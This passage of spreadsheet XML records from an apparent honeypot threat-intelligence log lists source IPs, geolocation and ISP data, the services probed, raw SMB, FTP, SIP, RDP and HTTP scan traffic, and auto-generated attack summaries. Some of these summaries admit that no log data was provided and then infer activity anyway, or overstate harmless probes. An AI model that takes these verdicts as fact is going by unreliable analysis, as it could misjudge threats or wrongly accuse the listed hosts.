(,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,55964)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,50476)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,54593)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,16691)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,25231)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,4538)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,34591)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,63829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293f:a728"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is probing various services to identify potential vulnerabilities and gain unauthorized access. They are attempting to brute-force login credentials, scanning for open ports, and sending malicious requests to exploit weaknesses in the systems. &amp;&amp; No log data is provided for analysis. _x000a__x000a_However, assuming typical honeypot logs, here's an example of what might be inferred:_x000a__x000a_Malicious activity detected involving attempted unauthorized access to sensitive system resources potentially via exploitation of vulnerabilities or brute-force attacks on credentials. Suspected malicious scripts or bots are attempting to scan and exploit open services on the network. Investigation into potential malicious intentions is warranted due to unusual traffic patterns. &amp;&amp; No log data provided. &amp;&amp; An incoming connection from an unknown IP address is attempting to access a service on the system, potentially indicating unauthorized access attempts. The source IP address 41.63.167.40 and port 34591 are trying to establish a connection. This could be a malicious actor probing for vulnerabilities. &amp;&amp; Possible malicious activity detected - an incoming SMB connection attempt from unknown IP address 41.63.167.40 to a potentially exposed service on this system. The source port is 34591, indicating potential brute-force or reconnaissance attempts. This could be a precursor to unauthorized data access or transfer. &amp;&amp; A remote host is connecting to a shared resource on a system, possibly attempting unauthorized access or file transfer. The source IP address and port number suggest an external entity initiating the connection. This could be a potential security threat if not properly managed. &amp;&amp; A remote system has established an incoming connection to a SMB service from IP address 41.63.167.40 on port 63829, potentially indicating a malicious attempt to access the system's resources or exploit a vulnerability. _x000a_The source IP may be attempting unauthorized file sharing or data transfer._x000a_This could also be part of a larger malware or ransomware attack. &amp;&amp; A malicious actor is attempting to authenticate using a SMB service, likely as part of a broader attack or reconnaissance effort._x000a_This could be an initial step towards gaining unauthorized access to sensitive network resources or data. _x000a_It may also indicate a brute-force attempt or password cracking operation. &amp;&amp; An SMB authentication attempt is detected, which may indicate a brute-force login or unauthorized access attempt. The presence of an authenticate message suggests a malicious actor trying to gain access to shared resources. This could be part of a larger attack on the network."/>
    <s v="SMB Scanning &amp;&amp; SMB Brute &amp;&amp; SMB Attack &amp;&amp; SMB Scanning &amp;&amp; SMB Bruteforce &amp;&amp; SMB Auth Bypass"/>
  </r>
  <r>
    <x v="86"/>
    <x v="86"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:16:30"/>
    <d v="2024-04-10T10:32:00"/>
    <d v="2025-04-30T18:16:30"/>
    <n v="75"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;43168&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="VE"/>
    <s v="Venezuela"/>
    <s v="A"/>
    <s v="Distrito Federal"/>
    <s v="Libertador Municipality"/>
    <s v="Caracas"/>
    <s v="3646738"/>
    <s v="NA"/>
    <s v="10.4806"/>
    <s v="-66.9036"/>
    <s v="394684"/>
    <s v="GOLD DATA USA INC"/>
    <s v="Gold Data C.A"/>
    <s v="business"/>
    <s v="Admin Systems"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,61363)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,61829)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,54665)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,54069)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,56875)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,57281)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,58366)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,58796)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,59889)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,60673)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,61603)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,62050)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,51611)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,52294)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,53941)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,54513)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,60538)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,60850)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c87d:bf22"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An incoming connection was made from IP address 200.125.191.34 to a SMB service on port 60538, which may indicate an attempt at unauthorized access or malicious activity. This could be part of a larger attack or reconnaissance. Further analysis is needed to determine the true intentions behind this connection. &amp;&amp; A suspicious incoming SMB connection has been detected from IP address 200.125.191.34 to port 60538, which may indicate a potential malware or ransomware attack. The target port suggests the attacker is attempting to exploit vulnerabilities related to file and printer sharing. This could be an initial step in spreading malicious software within the network. &amp;&amp; An incoming SMB connection attempt has been detected from an external IP address, potentially indicating a malicious attempt to access or exploit sensitive network resources on this system. This could be an attacker probing for vulnerable systems or attempting unauthorized file sharing access. Malicious SMB connections can often be indicative of larger cyber threats. &amp;&amp; Incoming SMB connection from IP 200.125.191.34 on port 60850, potentially indicating a brute force or unauthorized access attempt to a shared resource. This could be an indication of malware scanning for vulnerabilities or exploitation of weaknesses in the system. The source may be attempting to gain unauthorized access. &amp;&amp; Unauthorized access detected through SMB service, user authenticated and gained access to local resources. This suggests a potential security breach or attempted intrusion. User credentials were likely compromised or guessed correctly. &amp;&amp; An SMB user has authenticated using a basic credential, potentially indicating unauthorized access or a brute-force attack on a network share. This could be an attempt to escalate privileges or gain unauthorized access to sensitive files. The use of basic credentials suggests a lack of encryption or secure authentication."/>
    <s v="SMB Brute &amp;&amp; SMB Scan &amp;&amp; SMB Scanning &amp;&amp; SMB Auth"/>
  </r>
  <r>
    <x v="87"/>
    <x v="87"/>
    <s v="gracious.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:12:44"/>
    <d v="2023-07-31T17:02:40"/>
    <d v="2025-04-30T18:12:44"/>
    <n v="1314"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_RDP_H32&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_SOCKS5_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;32965&amp;&amp;443&amp;&amp;110&amp;&amp;3306&amp;&amp;23&amp;&amp;6379&amp;&amp;NA&amp;&amp;9100&amp;&amp;143&amp;&amp;1080&amp;&amp;21&amp;&amp;5432&amp;&amp;445&amp;&amp;1433&amp;&amp;3389&amp;&amp;1521&amp;&amp;25&amp;&amp;5900&amp;&amp;80&amp;&amp;389&amp;&amp;6667"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.244,54855)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'wuufnuig', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=wuufnuig', 'max-forwards': '0', 'to': 'sip:38.54.63.23', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKwuufnuig;received=87.236.176.244;rport=46876'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 91.194.11.82:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'ndajoldm', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=ndajoldm', 'max-forwards': '0', 'to': 'sip:154.90.63.129', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKndajoldm;received=87.236.176.244;rport=48035'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'tbjjjxyw', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=tbjjjxyw', 'max-forwards': '0', 'to': 'sip:149.102.153.168', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKtbjjjxyw;received=87.236.176.244;rport=36753'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.63.23:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'zvmogfgx', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=zvmogfgx', 'max-forwards': '0', 'to': 'sip:185.250.150.39', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKzvmogfgx;received=87.236.176.244;rport=38103'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'yxlsmeti', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=yxlsmeti', 'max-forwards': '0', 'to': 'sip:149.102.153.168', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKyxlsmeti;received=87.236.176.244;rport=59101'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57ec:b0f4"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze or provide any information about malicious activity. &amp;&amp; No LDAP activity detected, but this could be indicative of a potential scanning or probing attempt to identify vulnerable services. The lack of activity in the LDAP log suggests that an attacker may have been trying to exploit a weak password or other vulnerability. This could be a precursor to more malicious activity such as brute-force attacks or password cracking. &amp;&amp; Malicious activity detected involving attempted access or probing of a PostgreSQL service, possibly as reconnaissance for a potential attack. The attacker may be testing vulnerabilities or gathering information about the system's configuration. This behavior is indicative of pre-attack reconnaissance. &amp;&amp; Possible malicious activity: A user attempted to access help information, which could be a reconnaissance step or an attempt to gather information about the system before launching further attacks. This behavior is suspicious as legitimate users typically do not request help when interacting with the service."/>
    <m/>
  </r>
  <r>
    <x v="88"/>
    <x v="88"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:11:16"/>
    <d v="2024-06-10T03:10:00"/>
    <d v="2025-04-30T18:11:16"/>
    <n v="731"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;445&amp;&amp;21028&amp;&amp;25&amp;&amp;52802&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Bogor Regency"/>
    <s v="Caringin"/>
    <s v="1647298"/>
    <s v="NA"/>
    <s v="-6.70611"/>
    <s v="106.821"/>
    <s v="142317"/>
    <s v="PT Cover Network Indonesia"/>
    <s v="PT Cover Network Indonesia"/>
    <s v="business"/>
    <s v="PT Cover Network Indonesia"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52741)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53105)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55941)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56259)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60617)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53316)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53653)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52997)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,62715)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,63379)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60185)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60526)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56553)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56894)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60143)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60310)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60434)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,NULL)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60531)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60832)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60935)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61080)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61199)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61518)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61662)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53778)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54197)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54282)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54398)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54465)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54554)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54652)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54720)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54812)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54895)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54979)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55050)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55137)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55243)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55316)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55411)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55577)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55671)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55779)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56868)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56948)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57019)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57114)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57215)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57304)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57388)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection 